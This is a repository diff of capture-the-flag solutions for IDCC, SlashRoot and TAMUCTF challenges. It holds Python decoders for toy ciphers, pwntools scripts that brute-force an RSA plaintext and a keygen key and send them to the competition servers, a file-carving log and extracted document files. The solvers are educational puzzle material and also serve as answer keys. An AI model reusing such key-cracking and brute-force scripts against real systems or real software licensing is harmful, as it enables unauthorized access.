@@ -0,0 +1 @@
1
+F7=&D_6@9YU&9HA) MK9HL=RMSY3(

+ 35
- 0
IDCC/Crypto/DecryptME/test.py View File

@@ -0,0 +1,35 @@
1
+from base64 import *
2
+def enkripsi(plain, keys):
3
+	enc = []
4
+	plain = b64encode(plain)
5
+	for i, l in enumerate(plain):
6
+		kunci = ord(keys[i % len(keys)])
7
+		teks = ord(l)
8
+		enc.append(chr((teks + kunci) % 127))
9
+                #enc = teks + kunci
10
+	return ''.join(enc)
11
+
12
+def findKey():
13
+    key = []
14
+    known = b64encode("IDCC{")
15
+    file = open("enkripsi", "rb")
16
+    file = file.read()
17
+    for i, l in enumerate(known):
18
+        kunci = ord(file[i])
19
+        teks = ord(l)
20
+        key.append((chr((kunci - teks) % 127)))
21
+    return ''.join(key)
22
+
23
+def decryption():
24
+    key = "raja"
25
+    flag = []
26
+    file = open("enkripsi", "r").read()
27
+    for i, l in enumerate(file):
28
+        kunci = ord(key[i % len(key)])
29
+	cipher = ord(l)
30
+	flag.append(chr((cipher - kunci) % 127))
31
+    return ''.join(flag)
32
+
33
+    
34
+print findKey()
35
+print b64decode(decryption())

+ 29
- 0
SlashRoot/Crypto/RSA_Token_Generator/payload.py View File

@@ -0,0 +1,29 @@
1
+from pwn import *
2
+
3
+r = remote("103.200.7.156", 1003)
4
+
5
+r.recvuntil(">>> ")
6
+r.sendline("2")
7
+
8
+for i in range(5):
9
+	r.recvuntil("e = ")
10
+	e = r.recvline()
11
+	e = int(e[:-1])
12
+
13
+	r.recvuntil("n = ")
14
+	n = r.recvline()
15
+	n = int(n[:-1])
16
+
17
+	r.recvuntil("c = ")
18
+	c = r.recvline()
19
+	c = int(c[:-1])
20
+
21
+	p = 1000
22
+	while True:
23
+		if(pow(p, e, n) == c):
24
+			break
25
+		p +=1
26
+	r.sendline(str(p))
27
+	print "p = ", p
28
+
29
+r.interactive()

BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png View File


BIN
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png View File


BIN
TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png View File


BIN
TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png View File


BIN
TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png View File


BIN
TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png View File


+ 13
- 0
TAMUCTF/Crypto/Smile/decoder.py View File

@@ -0,0 +1,13 @@
1
+from base64 import *
2
+
3
+enc = "XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH"
4
+flag = b64decode(enc)
5
+key = ":)"
6
+newflag = []
7
+for i, l in enumerate(flag):
8
+	kunci = ord(key[i % len(key)])
9
+	cipher = ord(l)
10
+	newflag.append(chr(kunci ^ cipher))
11
+
12
+newflag = ''.join(newflag)
13
+print newflag

BIN
TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png View File


BIN
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png View File


BIN
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png View File


BIN
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png View File


+ 99
- 0
TAMUCTF/Misc/Hello_World/decoder.py View File

@@ -0,0 +1,99 @@
1
+flag = '''push103
2
+push 105
3
+push 103
4
+push 101
5
+push 109
6
+push 123
7
+push 48
8
+push 104
9
+push 95
10
+push 109
11
+push 121
12
+push 95
13
+push 119
14
+push 104
15
+push 52
16
+push 116
17
+push 95
18
+push 115
19
+push 112
20
+push 52
21
+push 99
22
+push 49
23
+push 110
24
+push 103
25
+push 95
26
+push 121
27
+push 48
28
+push 117
29
+push 95
30
+push 104
31
+push 52
32
+push 118
33
+push 51
34
+push 125
35
+push 33
36
+push 101
37
+push 99
38
+push 97
39
+push 112
40
+push 115
41
+push 101
42
+push 116
43
+push 105
44
+push 104
45
+push 119
46
+push 32
47
+push 102
48
+push 111
49
+push 32
50
+push 116
51
+push 111
52
+push 108
53
+push 32
54
+push 97
55
+push 32
56
+push 115
57
+push 105
58
+push 32
59
+push 101
60
+push 114
61
+push 117
62
+push 115
63
+push 32
64
+push 116
65
+push 97
66
+push 104
67
+push 116
68
+push 32
69
+push 44
70
+push 101
71
+push 101
72
+push 103
73
+push 32
74
+push 121
75
+push 108
76
+push 108
77
+push 111
78
+push 103
79
+push 32
80
+push 116
81
+push 101
82
+push 101
83
+push 119
84
+push 115
85
+push 32
86
+push 108
87
+push 108
88
+push 101
89
+push 87
90
+'''
91
+newflag = ""
92
+flag = flag.replace('push', '')
93
+flag = flag.replace('\n', '')
94
+flag = flag.split(" ")
95
+flag = map(int, flag)
96
+
97
+for i in flag:
98
+	newflag += chr(i)
99
+print newflag

BIN
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/art.png View File


+ 27
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt View File

@@ -0,0 +1,27 @@
1
+Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
2
+Audit File
3
+
4
+Foremost started at Sun Mar  3 15:59:09 2019
5
+Invocation: foremost art.png 
6
+Output directory: /home/chao/Documents/CTF/TAMUCTF/Misc/I_heard_you_like_files/output
7
+Configuration file: /etc/foremost.conf
8
+------------------------------------------------------------------
9
+File: art.png
10
+Start: Sun Mar  3 15:59:09 2019
11
+Length: 3 MB (3518869 bytes)
12
+ 
13
+Num	 Name (bs=512)	       Size	 File Offset	 Comment 
14
+
15
+0:	00006700.zip 	      86 KB 	    3430685 	 
16
+1:	00000000.png 	       3 MB 	          0 	  (1920 x 1080)
17
+2:	00006657.pdf 	      21 KB 	    3408641 	 
18
+Finish: Sun Mar  3 15:59:09 2019
19
+
20
+3 FILES EXTRACTED
21
+	
22
+zip:= 1
23
+png:= 1
24
+pdf:= 1
25
+------------------------------------------------------------------
26
+
27
+Foremost finished at Sun Mar  3 15:59:09 2019

BIN
TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png View File


BIN
TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip View File


+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml View File

@@ -0,0 +1,3 @@
1
+<?xml version="1.0" encoding="UTF-8"?>
2
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="png" ContentType="image/png"/><Default Extension="jpeg" ContentType="image/jpeg"/><Override PartName="/_rels/.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/word/_rels/document.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/media/image1.png" ContentType="image/png"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
3
+</Types>

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels View File

@@ -0,0 +1,3 @@
1
+<?xml version="1.0" encoding="UTF-8"?>
2
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
3
+</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>12</TotalTime><Application>LibreOffice/6.1.1.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application><Pages>1</Pages><Words>4</Words><Characters>24</Characters><CharactersWithSpaces>27</CharactersWithSpaces><Paragraphs>1</Paragraphs></Properties>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T15:47:36Z</dcterms:created><dc:creator></dc:creator><dc:description></dc:description><dc:language>en-US</dc:language><cp:lastModifiedBy></cp:lastModifiedBy><dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-20T16:00:01Z</dcterms:modified><cp:revision>1</cp:revision><dc:subject></dc:subject><dc:title></dc:title></cp:coreProperties>

+ 1
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt View File

@@ -0,0 +1 @@
1
+Sorry, no flag here

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels View File

@@ -0,0 +1,3 @@
1
+<?xml version="1.0" encoding="UTF-8"?>
2
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
3
+</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="TextBody"/><w:widowControl/><w:pBdr></w:pBdr><w:spacing w:before="0" w:after="225"/><w:ind w:left="0" w:right="0" w:hanging="0"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr><w:drawing><wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:align>center</wp:align></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>635</wp:posOffset></wp:positionV><wp:extent cx="2857500" cy="1600200"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapSquare wrapText="largest"/><wp:docPr id="1" name="Image1" descr=""></wp:docPr><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1" descr=""></pic:cNvPr><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId2"></a:blip><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2857500" cy="1600200"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:anchor></w:drawing></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Wait...now I am confused...</w:t></w:r></w:p><w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr></w:body></w:document>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:font w:name="Times New Roman"><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Symbol"><w:charset w:val="02"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Arial"><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Serif"><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Sans"><w:charset w:val="01"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="Open Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="auto"/><w:pitch w:val="default"/></w:font></w:fonts>

BIN
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png View File


+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:zoom w:percent="100"/><w:defaultTabStop w:val="709"/></w:settings>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml View File

@@ -0,0 +1,2 @@
1
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
+<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:widowControl/></w:pPr></w:pPrDefault></w:docDefaults><w:style w:type="paragraph" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:color w:val="auto"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="TextBody"/><w:qFormat/><w:pPr><w:keepNext w:val="true"/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="TextBody"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:pPr><w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="TextBody"/><w:pPr></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="Caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr></w:rPr></w:style></w:styles>

+ 10
- 0
TAMUCTF/Reverse/KeyGenMe/.gdb_history View File

@@ -0,0 +1,10 @@
1
+pdisas main
2
+b *main+200
3
+r
4
+pdisas verify_key
5
+b *verify_key+96
6
+r
7
+pdisas verify_key
8
+b *verify_key+96
9
+r
10
+r

BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png View File


BIN
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png View File


+ 20
- 0
TAMUCTF/Reverse/KeyGenMe/bruteforce.py View File

@@ -0,0 +1,20 @@
1
+from pwn import *
2
+v5 = ""
3
+v2 = ord('H')
4
+flag = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
5
+key = "[OIonU2_<__nK<KsK"
6
+iterator = 0
7
+while True:
8
+	for i in flag:
9
+		if(((ord(i) + 12) * v2 + 17) % 70 + 48) == ord(key[iterator]):
10
+			v5 += i
11
+			v2 = ord(key[iterator])
12
+			iterator += 1
13
+			break
14
+	if(len(v5) == len(key)):
15
+		break
16
+v5 = v5[:-1]
17
+print "Key: {}".format(v5)
18
+r = remote("rev.tamuctf.com", 7223)
19
+r.sendline(v5)
20
+r.interactive()

BIN
TAMUCTF/Reverse/KeyGenMe/keygenme View File


BIN
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png View File


BIN
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png View File


BIN
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png View File


BIN
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png View File


BIN
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png View File


BIN
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png View File


BIN
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png View File


BIN
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png View File


BIN
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png View File


BIN
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png View File


BIN
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png View File


BIN
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png View File


BIN
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png View File


Loading…
Cancel
Save